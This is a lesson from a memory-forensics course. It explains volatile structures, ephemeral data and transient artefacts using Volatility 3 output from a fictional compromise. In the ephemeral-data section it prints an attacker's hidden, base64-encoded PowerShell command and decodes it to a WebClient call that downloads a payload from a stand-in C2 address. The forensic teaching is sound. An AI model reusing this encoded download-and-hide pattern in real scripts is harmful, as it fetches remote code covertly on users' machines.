In this module
MF0.2 What Lives in Memory That Isn't on Disk
From MF0.1 you know memory is the decisive evidence for fileless malware, in-memory credential theft, LOLBin execution, and kernel rootkits — and when acquisition becomes mandatory. You know what memory wins against. What you don't yet have is a map of what's actually inside a memory image. That's what this sub builds.
Memory forensics succeeds or fails on the investigator's understanding of what memory contains. An investigator who treats memory as a homogeneous blob — "it's all just RAM" — can't prioritise acquisition during time-critical incidents, can't defend choices about what to analyse first when the image is 32 GB and the case is due in 48 hours, and can't explain to legal counsel why specific findings required memory rather than disk.
Memory isn't a blob. It's a structured collection of artefact categories, each with different volatility, different reliability, different acquisition sensitivity, and different forensic use cases. The investigator who knows the categories makes better acquisition decisions, better analysis decisions, and better reporting decisions.
This sub establishes the three-category taxonomy that structures the remainder of the course — volatile structures, ephemeral data, and transient artefacts — and the specific evidence types within each category that later modules will teach.
Deliverable: Working knowledge of the three memory artefact categories with concrete examples in each, the volatility ranking that determines acquisition priority, the relationship between each category and the investigation types it serves, and the taxonomy reference that organises analysis across every subsequent module.
Figure 0.2.1 — The three-category taxonomy. Each category has distinct discovery methods, reliability characteristics, and investigation use cases. Every finding you make in a memory forensics report classifies into one of these three.
Volatile structures — the kernel's bookkeeping
Volatile structures are the kernel's own record of what's running. They're the highest-reliability memory evidence because the kernel can't function without them, and they're where most investigations begin.
The first category is volatile structures — the kernel-maintained bookkeeping of everything happening on the system. The kernel keeps a running tally of processes, threads, network connections, open files, loaded drivers, and its own internal state because it has to. Without these structures the OS can't schedule work, route packets, or service system calls. An investigator reading a memory image reads the same structures the kernel was reading at acquisition.
Volatile structures have three forensic properties that matter. They're high-reliability because the kernel depends on them — a process in the active list existed, a TCP connection in the table was negotiated. They have multiple discovery methods because attackers manipulate them and the toolkit provides independent verification paths — processes can be enumerated by walking the active list, scanning the pool for process signatures, following thread back-references, or cross-referencing handles. When these methods disagree, the disagreement itself is evidence. And they're a named target for sophisticated attackers: Direct Kernel Object Manipulation unlinks a process from the active list while leaving thread structures intact; kernel hooks redirect NtQuerySystemInformation to filter out attacker processes. Defeating these manipulations is the foundation of the course's kernel-forensics modules.
The specific structures the course will teach include the process list (EPROCESS on Windows, task_struct on Linux), the thread list (ETHREAD, thread_info), the network connection table, per-process handle tables, the loaded module list, the VAD tree and VMA list, kernel callback lists, and the system call table. Each gets a dedicated subsection in the OS-specific phases.
Here's what volatile-structure evidence looks like in practice. Consider a memory image from NE-FIN-014 captured after a suspicious-process alert; the investigator enumerates network connections to find out what the compromised PowerShell was talking to.
$ vol -f NE-FIN-014-mem.raw windows.netscan
# Expected output (filtered for suspicious entries):
#
# Offset Proto LocalAddr ForeignAddr State PID Owner Created
# 0xfb8a0c TCPv4 192.0.2.14:51892 203.0.113.47:443 ESTABLISHED 4872 powershell.exe 2026-03-15 08:43:18
# 0xfc1220 TCPv4 192.0.2.14:51934 192.0.2.8:445 ESTABLISHED 4 System 2026-03-15 08:44:02
# 0xfd44e8 TCPv4 192.0.2.14:52018 203.0.113.47:443 CLOSED_WAIT 4872 powershell.exe 2026-03-15 11:22:47The network connection table is populated and maintained by the Windows kernel as part of its normal operation — PID 4872 couldn't have communicated on TCP without an entry. The table links each connection to its owning process by PID and timestamps each connection's creation. Here it proves PID 4872 — the suspicious PowerShell from the earlier windows.pstree output — established two connections to 203.0.113.47:443, the first at 08:43:18 (36 seconds after process start) and a later one at 11:22:47 still present at acquisition in CLOSED_WAIT.
The C2 IP is now firm evidence tied to a specific process and timestamp. The firewall log would show the same connections, but the memory evidence independently proves the internal process that made them. That's the volatile-structure pattern: kernel populates the evidence as part of normal operation, the linkage to process context is direct, and reliability is high.
Ephemeral data — the applications' working state
Ephemeral data is what running applications hold in their own memory. It's the category that produces evidence appearing nowhere else — credentials, command history, decrypted documents — and the one that most rewards knowing what to look for.
The second category is ephemeral data. This is the working state that running applications hold in their own memory — cached credentials inside LSASS, Kerberos tickets in the Kerberos client cache, bash command history in the bash process's ring buffer, the clipboard inside Windows Explorer, decrypted documents inside the application that opened them, session tokens inside browser processes, environment variables inside every process's environment block.
Unlike volatile structures, ephemeral data isn't kernel-maintained. It lives in user-mode process memory, subject to whatever memory management the application chooses. That difference produces different forensic properties.
Reliability is context-dependent. A value's meaning depends on the application's state and configuration — a plaintext password in LSASS is decisive if WDigest was enabled at the time; the same region is empty on a modern Windows 10/11 system where WDigest is off by default. A bash history entry proves a command was typed in that shell, not that it completed, succeeded, or accessed what it appeared to target. Ephemeral data needs application-specific interpretation that volatile structures don't.
Discovery is typically single-path. Most ephemeral data has one correct extraction — the application-specific structure that contains it. There are rarely independent paths to the same ephemeral evidence the way there are for EPROCESS. Miss the bash history buffer and there's no pool-scan fallback that recovers it.
And ephemeral data is an intermittent anti-forensic target. LSASS credentials, SSH agent keys, decrypted session material — routinely targeted. Clipboard contents, DNS cache — rarely touched. The attacker's incentive varies case-by-case.
Here's what ephemeral-data extraction looks like. A PowerShell process (PID 4872) on NE-FIN-014 was launched with an encoded command line. Disk Script Block Logging captured the encoded string, but the investigator needs the decoded command.
$ vol -f NE-FIN-014-mem.raw windows.cmdline --pid 4872
# Expected output:
#
# PID Process Args
# 4872 powershell.exe powershell.exe -nop -w hidden -enc JABjAD0ATgBlAHcALQBPAGIAag
# BlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMALgBEAG8
# AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAy
# ADAAMwAuADAALgAxADEAMwAuADQANwAvAGkAbgB2AC4AdAB4AHQAJwApAA==The command-line arguments are stored in the process's environment block (PEB on Windows) and remain in memory for the process's lifetime. Base64-decoding the -enc argument reveals the actual command: $c=New-Object Net.WebClient;$c.DownloadString('https://203.0.113.47/inv.txt'). The process downloaded a secondary payload from the same C2 IP windows.netscan revealed — and confirmed in decoded form.
Disk log entries contain the encoded string. The decoded command is application-held state that lives only in the process's memory until it exits. That's ephemeral data in practice: evidence is application-held, context-dependent, and extraction is per-application.
Transient artefacts — the attack's footprints
Transient artefacts are the traces attackers leave behind in memory. They have no legitimate analogue, they're the target of every anti-forensic technique, and finding them requires pattern-based scanning rather than list walking.
The third category is transient artefacts — the memory artefacts introduced by attacker activity. Code injected into a legitimate process, reflectively-loaded DLLs that don't appear in the module list, process hollowing where an image section no longer matches its VAD contents, kernel hooks in function pointer tables, shellcode sitting in a heap region of a normally-benign application. Transient artefacts exist because an attack occurred and disappear the moment the attacker's payload unloads, the affected process terminates, or the system reboots. They have no legitimate analogue on a clean system.
Transient artefacts have the most aggressive forensic properties.
Discovery is pattern-based, not list-walking. Because attackers designed these artefacts specifically to evade detection, there's no authoritative list to enumerate. Finding injected code means scanning every VAD entry for regions with suspicious characteristics — executable + writable + private, containing MZ/PE headers, not backed by a file on disk. Finding kernel hooks means walking every function pointer table and comparing each pointer against expected symbol addresses. Finding rootkit-allocated memory means pool-tag-scanning and investigating every allocation that doesn't match legitimate structures.
Reliability varies with attacker technique. Classical techniques — basic reflective injection, SSDT hooking — leave clear signatures that any modern plugin detects. Modern techniques — module stomping, eBPF-based hooking, kernel structure manipulation that preserves all integrity invariants — may not surface in first-pass tool output.
Transient artefacts are always an anti-forensic target. Every one was placed by an attacker who wanted it to work undetected. Unlike volatile structures (attackers hide there to evade detection) or ephemeral data (attackers sometimes hide there), transient artefacts are hostile to investigation by default.
Transient artefacts covered later in the course include RWX injected code regions, reflectively-loaded DLLs absent from PEB_LDR_DATA, process hollowing evidence, process doppelgänging and herpaderping, kernel-mode injected code in the system working set, SSDT and IDT and GDT hooks, kernel callback hijacking, Linux syscall table hooks, VFS operation table hooks, netfilter hooks used for C2 concealment, eBPF-based rootkit programs, rootkit-allocated kernel memory regions, shellcode in application heap segments, and unlinked kernel objects hidden via DKOM.
Concretely, transient artefact discovery looks unlike the first two categories. There's no "list of injections" the kernel maintains — finding injected code means scanning every process's VAD tree for regions whose characteristics are anomalous. This is pattern-based hunting, not list walking.
# Scan every process for suspicious memory regions. Unlike pslist or
# netscan, there's no authoritative list — this plugin walks every
# process's VAD tree and flags regions by anomaly pattern.
$ vol -f NE-FIN-014-mem.raw windows.malfind
# Expected output (filtered for highest-confidence findings):
#
# PID Process VAD Start VAD End Protection Notes
# 4872 powershell.exe 0x7ff8a2100000 0x7ff8a2118000 PAGE_EXECUTE_READWRITE Private, MZ header, no file backing
# 1816 explorer.exe 0x0000022f4a3c0000 0x0000022f4a3c2000 PAGE_EXECUTE_READWRITE Private, no PE header — investigate
# 2204 chrome.exe 0x0000013b87600000 0x0000013b8762a000 PAGE_EXECUTE_READWRITE Private, JavaScript JIT — benignThe plugin walked every process's VAD tree and returned every region matching the "executable + writable + private" pattern. Three hits appear. Two are benign — JavaScript JIT in Chrome (expected), a small unclear region in Explorer that needs further analysis. The third, in PID 4872, shows the pattern plus an MZ header: a reflectively-loaded PE with no corresponding entry in the module list, no file-backing on disk, no record the kernel maintains of its existence.
The investigator found it by asking a pattern-based question — "show me memory regions that look like injected code" — rather than by walking an authoritative list. That's the defining property of transient artefacts: they're hostile to investigation by design, and detection requires scanning for anomalies rather than enumerating known objects.
The situation. You're reviewing a VAD dump from an analyst on your team. The dump lists a memory region in an NE-FIN-014 process with PAGE_EXECUTE_READWRITE protection, private allocation, no file backing, no module in the process's module list — but the first bytes are 4D 5A 90 00, clearly a PE image. The analyst classified it as "volatile structure — kernel bookkeeping of the process's memory layout" because it came from a VAD tree, which is kernel-maintained.
The choice. Accept the classification since the VAD tree is indeed a volatile structure, or push back because classification isn't determined by which tool surfaced the finding.
The correct call. Push back. The VAD tree is a volatile structure; an entry within it describing a private executable region with a PE header and no file backing is a transient artefact — attack-introduced, pattern-based discovery, anti-forensic target. The practical consequence of the misclassification is that the finding gets reported with claim language for volatile structures ("the process had this VAD entry") rather than transient artefacts ("the process contained an injected PE image of these characteristics; injection occurred between process start and acquisition"). The stronger, more specific claim is the correct one.
The operational lesson. Classify by what the evidence is, not where the tool found it. The same underlying structure can hold evidence from all three categories — a VAD entry might describe a normal loaded module (volatile), a JIT-compiled region (ephemeral), or an injected payload (transient). The classification follows the nature of the finding, not the plugin that produced it.
The myth. Volatility 3 ships with an extensive plugin library covering processes, network connections, DLLs, kernel objects, credentials, and rootkit detection. Running the full suite on a memory image produces comprehensive coverage. If a finding doesn't appear in any plugin's output, it's reasonable to conclude the evidence isn't present.
The reality. Volatility 3's plugins cover established techniques for each artefact category well. They don't cover every artefact, and they don't cover emerging techniques until the plugin catches up.
Coverage is strongest for volatile structures — process, network, and handle plugins are mature. It's moderate for ephemeral data — credential plugins exist for common cases, but application-specific extraction is typically manual. It's variable for transient artefacts — classical injection techniques are caught, novel techniques may not be.
An investigator who runs the full plugin suite and concludes "nothing found" has demonstrated that nothing was found using those plugins. The investigator who then examines VAD trees for anomalies, pool-scans for unexpected tags, and compares module lists against active threads has searched for what exists rather than for what plugins report. The plugin suite is a starting point, not an endpoint. Later modules repeatedly demonstrate cases where plugin output is clean and manual structural analysis reveals compromise.
How the taxonomy guides investigation decisions
The taxonomy is operational, not theoretical. It tells you what to capture when acquisition is time-constrained, what to analyse first when triaging a fresh image, and what claim strength a finding supports in your report.
The three categories aren't just a mental model. They drive specific investigation decisions.
Acquisition priority when memory capture is time-constrained. If the acquisition tool's slower than expected, the attacker might be watching for acquisition activity, or the live-response window's short, the volatility hierarchy determines what to capture first. Volatile structures change constantly but are captured by any image. Ephemeral data gets lost to normal process activity — clipboard overwrites, buffer recycling — but not to time alone. Transient artefacts disappear if the attacker's payload terminates or unloads during acquisition. Priority order: transient first, then ephemeral, then volatile. In practice this argues for full acquisition; when it must be partial, the category affects the sequence.
Analysis priority when triaging a fresh image. Faced with a memory image and the question "was this system compromised," the transient artefact category is where compromise evidence most often lives. Scanning for injected code, unusual module loads, kernel hook anomalies, and pool-tag anomalies gets you to the compromise signal faster than enumerating the full process list first. Once compromise is identified, volatile structures provide the context — what processes, what connections, what handles — and ephemeral data provides the specifics — what commands, what credentials.
Reporting claims based on category. Every finding in a memory report should carry claim strength that matches the evidence category. Volatile structure findings support strong claims: "at the time of acquisition, this process was running, owned by this user, with these open handles." Ephemeral data supports specific but context-qualified claims: "at acquisition, this credential was cached in LSASS; it would have been cached because of a logon that occurred at or after boot at 08:14 UTC." Transient artefacts support claims that need correlation: "at acquisition, this process contained an injected DLL of X characteristics; injection occurred between process start at 14:22 and acquisition at 21:47." The category structures the language of confident reporting.
Try it: classify malfind hits against a self-captured image
Use any memory image you have available — your own analyst workstation captured with WinPmem, or one of the practice images from the NE scenario pack you'll set up in MF0.9. Run vol -f image.raw windows.malfind and capture the output.
For each hit the plugin reports, classify it into one of the three taxonomy categories. Most hits on a clean image will classify as ephemeral data — JavaScript JIT regions in browsers, .NET JIT in managed processes, dynamic code generation in legitimate software. Hits on a compromised image will include transient artefacts — reflectively-loaded DLLs, shellcode regions, hollowed processes.
For each hit, write one sentence explaining what in the plugin output supports your classification — the specific field, the specific value, the specific pattern. This is the working judgment memory forensics requires: the plugin flags a region, and your job is to decide what that region is. The exercise trains the judgment every later module assumes.
You've set up the lab and captured your first clean baselines.
MF0 built the three-VM lab and established the memory forensics landscape. MF1 taught acquisition with WinPmem and LiME, integrity verification, and chain of custody. From here, you execute attacks and investigate what they leave behind.
- 8 attack modules (MF2–MF9) — process injection, credential theft, fileless malware, persistence, kernel drivers, Linux rootkits, timeline construction, and a multi-stage capstone
- You run every attack yourself — from Kali against your target VMs, then capture memory and investigate your own attack's artifacts with Volatility 3
- MF9 Capstone — multi-stage chain (initial access → privilege escalation → credential theft → persistence → data staging), three checkpoint captures, complete investigation report
- The lab pack — PoC kernel driver and LKM rootkit source code, setup scripts, 21 exercises, 7 verification scripts, investigation report templates
- Cross-platform coverage — Windows and Linux memory analysis in one course, with the timeline module integrating evidence from both
Cancel anytime